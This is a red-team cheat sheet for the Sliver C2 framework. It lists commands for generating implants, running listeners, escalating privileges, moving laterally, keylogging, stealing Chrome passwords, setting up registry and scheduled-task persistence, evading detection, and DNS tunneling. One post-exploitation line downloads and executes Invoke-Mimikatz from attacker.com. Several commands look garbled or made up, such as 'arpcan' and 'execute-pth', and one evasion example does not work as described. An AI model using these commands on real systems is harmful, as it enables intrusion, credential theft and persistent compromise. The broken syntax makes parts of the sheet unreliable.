Sliver C2

Sliver is an open-source C2 framework written in Go with capabilities comparable to Cobalt Strike. It supports multi-protocol comms (mTLS, WireGuard, DNS) and cross-platform implants.

Installation

Linux/macOS

# Download and build from source
git clone https://github.com/BishopFox/sliver.git
cd sliver
make

# Run server
./sliver-server

Docker

# Build Docker image
docker build -t sliver:latest .

# Run server container
docker run -it --rm -v ~/.sliver:/root/.sliver sliver:latest

Server Commands

Command	Description
sliver-server	Start C2 server
sliver	Enter interactive shell
help	Display available commands
sessions	List active sessions
generate	Create implant binary

Generating Implants

mTLS Implant

sliver > generate --http --save /tmp/implant.exe
# Creates HTTP-based implant

sliver > generate --mtls --lhost 192.168.1.100 --lport 8443 --save /tmp/implant
# Creates mTLS implant connecting to 192.168.1.100:8443

WireGuard Implant

sliver > generate --wg --save /tmp/agent.exe
# Creates WireGuard tunnel implant

DNS Implant

sliver > generate --dns sinkhole.local --save /tmp/dns_agent
# DNS-over-HTTPS exfiltration

Cross-Platform

sliver > generate --os windows --arch amd64 --mtls localhost:8443
sliver > generate --os linux --arch amd64 --format elf
sliver > generate --os macos --arch amd64

Listener Management

Command	Description
listeners	List active listeners
mtls --lhost 0.0.0.0 --lport 8443	Start mTLS listener
http --host 0.0.0.0 --port 80	Start HTTP listener
dns --domain example.com	Start DNS listener

Session Operations

# List sessions
sliver > sessions

# Interact with session
sliver > use <SESSION_ID>

# Background session
[session] > background

# Kill session
sliver > kill <SESSION_ID>

# Info about session
sliver > info

Beacon/Implant Commands

# Execute shell command
[session] > execute /bin/bash -c "whoami"

# Interactive shell
[session] > shell

# Download file
[session] > download /etc/passwd /tmp/passwd

# Upload file
[session] > upload /tmp/payload /tmp/payload

# List files
[session] > ls /home/user

# Process listing
[session] > ps

# Change directory
[session] > cd /var/www

# Get current user
[session] > whoami

# Check hostname
[session] > hostname

Privilege Escalation

# Run in-memory
[session] > execute-assembly /tmp/Seatbelt.exe

# Token impersonation (Windows)
[session] > impersonate DOMAIN\Administrator

# Bypass UAC
[session] > execute powershell.exe -NoP -C "Start-Process cmd.exe -Verb RunAs"

Lateral Movement

# PSExec
[session] > psexec DOMAIN\Administrator hash target.example.com cmd.exe

# WinRM
[session] > execute-wmi -computername target.example.com -command "whoami"

# Pass-the-hash
[session] > execute-pth DOMAIN\Administrator hash target.example.com

Data Exfiltration

# Screenshot
[session] > screenshot

# Keystroke logging
[session] > keylog start
[session] > keylog stop

# Dump credentials (Windows)
[session] > execute powershell.exe -NoP -C "Get-LocalUser"

# Extract Chrome passwords
[session] > execute powershell.exe -NoP -C "[...]Chrome password extractor script[...]"

Persistence

# Scheduled task (Windows)
[session] > execute powershell.exe -NoP -C "New-ScheduledTask -TaskName 'Update' -Trigger (New-ScheduledTaskTrigger -AtStartup) -Action (New-ScheduledTaskAction -Execute 'C:\temp\beacon.exe')"

# Registry persistence
[session] > execute powershell.exe -NoP -C "Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -Name 'Update' -Value 'C:\temp\beacon.exe'"

# Service installation
[session] > execute sc.exe create UpdateService binPath= "C:\temp\beacon.exe"

Evasion Techniques

# In-memory execution
[session] > execute-assembly /tmp/payload.bin

# Environment variable encoding
[session] > execute cmd.exe /c "set x=calc.exe && %x%"

# PPID spoofing
[session] > execute --parent-pid 1234 cmd.exe /c dir

# Sleep obfuscation
[session] > sleep 3600  # 1 hour sleep interval

DNS Tunneling

# Configure DNS callback
sliver > generate --dns example.com --domain callback.example.com

# Monitor DNS traffic
[session] > dns-config --domain exfil.example.com

# DNS-over-HTTPS
[session] > dns-config --doh-url "https://dns.example.com/dns-query"

Staging

# Create multi-stage payload
sliver > stage-listener --http localhost:8080

# Generate stage 1
sliver > generate --http localhost:8080 --format shellcode --save /tmp/stage1.bin

# Deliver stage 1 -> stage 2
# Stage 1 downloads full implant from staging listener

Traffic Rules

# Create router for traffic redirection
sliver > route-add --ip-range 10.0.0.0/8 --gateway-ip 192.168.1.1

# Tunnel outbound traffic
sliver > tun-device --mtu 1500

Cleanup and Exit

# Gracefully exit session
[session] > exit

# Force kill beacon
sliver > kill <SESSION_ID>

# Clean server
sliver > cleanup-all

# Stop server
sliver > stop

Advanced Post-Exploitation

# Bloodhound enumeration
[session] > execute powershell.exe -NoP -C "Invoke-BloodHound -Domain DOMAIN.LOCAL"

# Rubeus for Kerberos attacks
[session] > execute-assembly /tmp/Rubeus.exe roast /format:hashcat

# SharpView domain enumeration
[session] > execute-assembly /tmp/SharpView.exe Get-DomainUser

# MimiKatz
[session] > execute powershell.exe -NoP -C "IEX (New-Object Net.WebClient).DownloadString('https://attacker.com/Invoke-Mimikatz.ps1'); Invoke-Mimikatz"

Network Reconnaissance

# Arpcan for local network
[session] > arpcan

# Ifconfig equivalent
[session] > ifconfig

# Netstat
[session] > netstat

# Network interface info
[session] > execute ipconfig /all

Best Practices

• Use HTTPS/mTLS for reliable C2 comms
• Implement DNS/DoH for evasion
• Randomize beacon intervals to avoid detection
• Use multiple listener types for failover
• Regularly rotate implant signatures
• Clean up sessions and listeners post-operation
• Monitor operator logs for OPSEC violations

Resources

• Sliver GitHub
• Sliver Docs
• C2 Framework Comparison